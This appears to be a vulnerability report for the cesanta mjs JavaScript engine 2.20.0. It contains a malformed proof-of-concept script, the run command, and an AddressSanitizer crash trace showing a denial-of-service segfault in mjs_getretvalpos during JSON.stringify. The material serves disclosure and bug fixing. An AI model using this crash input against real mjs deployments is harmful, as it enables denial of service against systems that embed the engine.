poc
````
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify+= i;
c /= 0, c } 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
````
run command
mjs -f poc
ASAN info
AddressSanitizer:DEADLYSIGNAL
=================================================================
==184==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7ff84edb0535 bp 0x7ffea0260498 sp 0x7ffea0260498 T0)
==184==The signal is caused by a READ memory access.
==184==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used.
#0 0x7ff84edb0535 in vasprintf /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57
#1 0x7ff84ed8d113 in asprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/asprintf.c:35
#2 0x7ff84ed58353 in __assert_fail_base /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:57
#3 0x7ff84ed58471 in __assert_fail /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:101
#4 0x4eeb98 in mjs_getretvalpos (/mjs/mjs+0x4eeb98)
#5 0x4eebe5 in mjs_arg (/mjs/mjs+0x4eebe5)
#6 0x4ec5e8 in mjs_op_json_stringify (/mjs/mjs+0x4ec5e8)
#7 0x4ef755 in mjs_exec_internal (/mjs/mjs+0x4ef755)
#8 0x4efa40 in mjs_exec_file (/mjs/mjs+0x4efa40)
#9 0x4f75b9 in main (/mjs/mjs+0x4f75b9)
#10 0x7ff84ed49c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#11 0x41b7f9 in _start (/mjs/mjs+0x41b7f9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57 in vasprintf
==184==ABORTING
The name of an affected Product mjs
The affected version Commit: b1b6eac (Tag: 2.20.0)
Description An issue in cesanta mjs 2.20.0 allows a remtoe attacker to cause a denial of service via the mjs_getretvalpos function in the mjs.c file.
Vulnerability Type segmentation violation
Environment
Steps to Reproduce
poc
```` let i, a = 0, b0= 0, c = 0continu, d0, e = 0; for (i = 8; i < 20; i++) { a let z = JSON.parse('""'); // Zlength string let s2 = JSON.stringify+= i; c /= 0, c } 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}'; let o = JSON.parse(s); let z = JSON.parse('""'); // Zlength string let s2 = JSON.stringify(o)AAA ````run command
ASAN info